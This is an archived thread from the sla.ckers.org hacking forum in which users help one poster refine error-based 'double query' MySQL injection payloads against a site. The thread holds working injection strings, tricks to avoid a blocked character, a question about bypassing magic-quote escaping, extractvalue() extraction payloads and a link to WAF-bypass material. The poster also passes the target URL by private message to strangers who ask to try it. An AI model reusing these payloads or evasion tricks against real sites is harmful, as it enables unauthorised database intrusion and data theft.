Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
double query sql injection, need very small help
Posted by: jammy99
Date: May 24, 2013 02:28AM

i can successfully execute this query in one of my host for pen testing...

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

is there a way to use something else in place of

rand(0)*2

actually i can not use * in my sql injection because of some reason. So i just thought to ask you guys if there is a way to avoid * from above query

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: infinity
Date: May 24, 2013 08:31AM

Hi jammy99,

instead of using the multiplication by 2 in

rand(0)*2

you can try to divide by 1/2 or 0.5:

rand(0)/(1/2)

rand(0)/0.5

This avoids the asterisk * and the result is the same, at least this is the case on my system :)



Edited 1 time(s). Last edit at 05/24/2013 08:32AM by infinity.

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 24, 2013 10:01AM

hi infinity
thank you very much for your reply :-)

my bad luck :-(

they just turned on the magic Quote :-(

my double query injection was running like

hi' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

but now it go like \' so can not inject it anymore :-( or if there is any other way to bypass Single QUOTE in such a problem?


however i have one more point where i can run blind sql injection. So i was thinking that my double query will work there. But i got hard luck its not working there. But as far as i think it must work there because it should go like

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/0.5)) having min(0) or 1--

21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)/(1/2))) having min(0) or 1--


:-( what can i do?



Edited 1 time(s). Last edit at 05/24/2013 10:02AM by jammy99.

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 25, 2013 01:36AM

or if i can share site URL with anyone in PM?

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: ajkaro
Date: May 27, 2013 04:53AM

Send me the URL to PM. I will check it out...

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: May 27, 2013 01:38PM

Pm Sent

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: hack2012
Date: June 02, 2013 02:01AM

I want to try , can you sent it to me ???

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 02, 2013 10:42PM

pm sent

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: hack2012
Date: June 04, 2013 02:46AM

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

and extractvalue(1, concat(0x7e, (select user()),0x7e))

For more Waf bypass Please visit my BLog:

http://www.waitalone.cn/tag/bypass

I am from China !



Edited 2 time(s). Last edit at 06/04/2013 03:07AM by hack2012.

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 04, 2013 02:58AM

i already have this solution. this is already provided by ajkaro.

i hope you could get another way with double query only.

btw pls check pmb

Options: ReplyQuote
Re: double query sql injection, need very small help
Posted by: jammy99
Date: June 04, 2013 03:06AM

thank you very much



Edited 1 time(s). Last edit at 06/04/2013 03:12AM by jammy99.

Options: ReplyQuote


Sorry, only registered users may post in this forum.